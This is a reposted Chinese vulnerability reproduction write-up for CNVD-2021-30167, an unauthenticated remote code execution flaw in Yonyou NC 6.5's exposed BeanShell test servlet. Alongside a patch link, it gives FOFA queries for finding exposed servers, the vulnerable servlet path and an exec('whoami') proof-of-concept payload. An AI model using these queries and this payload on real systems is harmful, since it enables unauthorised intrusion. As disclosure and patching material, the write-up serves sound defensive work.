CNVD-2021-30167用友NC BeanShell 漏洞复现(CNVD-2021-30167)
Posted 星球守护者
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了CNVD-2021-30167用友NC BeanShell 漏洞复现(CNVD-2021-30167)相关的知识,希望对你有一定的参考价值。
文章目录
漏洞名称
- 用友NC BeanShell远程代码执行漏洞
漏洞介绍
- 用友NC采用J2EE架构,面向大型企业集团和成长中的集团企业的信息化需求,为集团企业提供建模、开发、集成、运行、管理一体化的信息化解决方案。
- 2021年6月2日,用友公司发布了关于
用友NC BeanShell远程代码执行漏洞
的风险通告。
漏洞编号
- CNVD-2021-30167
漏洞描述
- 由于用友NC对外开放了
BeanShell的测试接口
,未经身份验证
的攻击者利用该测试接口, - 通过向目标服务器发送恶意构造的Http请求,在目标系统上直接
执行任意代码
,从而获得目标服务器权限。
影响版本
- 用友NC
6.5
版本
FOFA
title=="YONYOU NC"
app="用友-UFIDA-NC"
漏洞点
http://ip/servlet/~ic/bsh.servlet.BshServlet
exec("whoami");
漏洞复现
https://1x.1x.xx.xx:8443/servlet/~ic/bsh.servlet.BshServlet
修复建议
由于该漏洞的出现是因第三方jar包的漏洞导致,用友NC官方已发布相关的安全补丁
,使用该产品的用户需要及时安装该漏洞补丁包
补丁地址:
http://umc.yonyou.com/ump/querypatchdetailedmng?PK=18981c7af483007db179a236016f594d37c01f22aa5f5d19
免责声明
本文档供学习,请使用者注意使用环境并遵守国家相关法律法规!由于使用不当造成的后果上传者概不负责!
摘抄
大雨中为你撑伞的人,黑暗中默默抱紧你的人,
逗你笑的人,陪你彻夜聊天的人,
坐车来看你的人,在医院陪你的人,
陪你哭过的人,总是以你为重的人,
是这些温暖使你成为善良的人。
以上是关于CNVD-2021-30167用友NC BeanShell 漏洞复现(CNVD-2021-30167)的主要内容,如果未能解决你的问题,请参考以下文章
用友NC6.5 BeanShell远程代码执行漏洞复现(CNVD-2021-30167)
用友NC6.5 BeanShell远程代码执行漏洞复现(CNVD-2021-30167)